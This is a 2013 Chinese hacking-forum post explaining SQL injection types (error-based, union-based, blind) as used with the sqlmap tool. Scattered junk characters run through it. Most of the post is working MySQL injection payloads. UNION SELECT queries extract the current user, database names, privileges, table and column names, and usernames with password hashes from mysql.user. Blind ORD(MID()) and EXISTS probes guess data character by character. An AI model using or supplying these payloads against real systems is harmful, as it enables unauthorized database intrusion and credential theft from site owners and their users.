找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2229|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。. x" \& L+ L  K* d* N+ O$ L! r

2 T( s1 ?4 A! N0 j  v这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表' r# `, N/ Z" g# ]
, f# H+ W/ ^5 k: [
分类标准        分类        备注+ B5 z7 z! y2 f- d
按字段类型        整型注入,字符型注入       
2 g  R( _" O) O5 p1 I* u% W4 z按出现的位置        get注入,post注入,cookie注入,http header注入        . ~. ~" K# C7 D% i% u
然而高级注入是这样的! v5 b3 B  k6 V7 N
) e. }+ I8 c! d, Z* ~- D6 ^! t
高级注入分类        条件7 }) k" d7 Y: S% f6 {
error-based sql        数据库的错误回显可以返回,存在数据库,表结构- I; e9 M4 \, k% p! \
union-based sql        能够使用union,存在数据库,表结构
. s$ x# w6 ]  z0 M1 P  D2 Qblind sql        存在注入
  H6 ~$ W" v: c我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。" ^! b7 r1 u' s1 ^9 q/ k. x
0 w" ~# m& I3 V/ v1 u) _$ E( c
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
6 E5 [' a4 Z: _) D1 H2 E6 E # N& F9 T8 _& q9 ]% k9 K4 b
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。2 V  ]6 u" F8 C6 w, q, `0 m/ C

" ?  u+ ?  z; e( h这里用mysql说明
% ?8 l+ j: s3 {2 \& k& L
' @$ D# k# d0 Se注入坛子里很多了,请看戳我或者再戳我
# |- m& ]" p. L& r: H4 I9 Q, h/ \ 0 |6 b" }) G( L8 l6 B8 c6 V; U3 v
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的6 V) ]4 c: P! @4 i/ A8 O

. N4 ^+ T1 q! m: C+ P3 l1 ]( z获取当前数据库用户名' E( y5 P) ~; s! ]0 A
7 t" [+ R8 X4 V
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
$ T7 @6 `$ h5 `  P$ T8 fAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
2 T5 c) t1 g, \, RL, NULL#
& Z5 T4 U# _, R, }8 R! ]# @) B# h注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
/ v3 f/ b" \& n2 Q- J# a' y; O! L! s
' K3 ^6 E8 m% S4 O7 J获取数据库名
( p$ |# d& W2 D  F7 Q8 |0 v8 R ; R, W: L' U1 ]! o. o5 Z7 d# n4 A! Y
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#2 t# d# d, }/ `* t* ~' f
获取所有用户名
  |: _: n# z* t7 W( Q; t! n ! s. h$ M2 ]6 K( C9 i) K; R
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#  U7 X: |( V) y. H7 ]# F& c
查看当前用户权限
; q& v& B, R) ~& G! H8 B& q$ g 4 V" j4 }" m2 d' p/ ]# I8 A* X4 c
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#3 F; Q% I( N: d$ E
尝试获取密码,当然需要有能读mysql数据库的权限4 p# g9 v5 `' _' ]7 R; ]+ ~

& c% l4 ?# b& q1 C8 ~UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
$ q# c1 D: |; t$ D# {0 X- T获取表名,limit什么的自己搞啦. `6 E: w9 k& k* S( ~

9 W% x" W, `0 l/ j) EUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#/ x. r7 C6 r- G5 r  C
获取字段名及其类型$ m' `- ]5 B# h5 s' ]
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#  M  H6 }9 y- K" H) Z
/ {5 k8 _9 s# U. K- s
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。8 Y' h0 [  `1 ~/ l! e. m3 u4 p

3 G& |2 J# F( K! a, ]如:
% Q4 S$ u" K& _3 y  x( _获取当前用户名0 H, W! R* P- N' E

5 ?6 a9 a" p" a# e( s; ?/ p$ JAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
1 i0 Y/ \, Q' y3 d& a获取当前数据库0 ~/ E0 M. o4 X  s/ b! U0 v7 l

! |$ q, @0 x- @* fAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
( K# V7 b1 }! ]7 F获取表名# T' c2 y. M5 m* u- w* G# e+ \

! m/ R0 P6 m! ^" S* t+ i+ wAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51* D; C4 e1 R; Y0 o1 j9 O; c5 ]
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。  \% d. e8 v5 @; J
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。& p/ I6 [, j/ h
爆表( o! H" @+ b. `% L
7 [' M% S- S+ Z, W# o4 K
AND EXISTS(select * from table)& J/ {. ]7 Q* `* j
爆字段
* q/ D! i$ u$ E! T+ {' q" F 3 t/ w: i4 @  c1 G: ]
AND EXISTS(select pwd from table)
. |$ D$ I/ K% w7 s0 G- C. x8 [" N$ u盲注的变化就比较多了,由于篇幅,只是举个例子而已。
2 q4 @. [; R. f8 A, T
& d5 U. E4 z9 D! u/ s" p本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。* F6 p5 M3 ^4 @0 O/ }) q$ l- P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表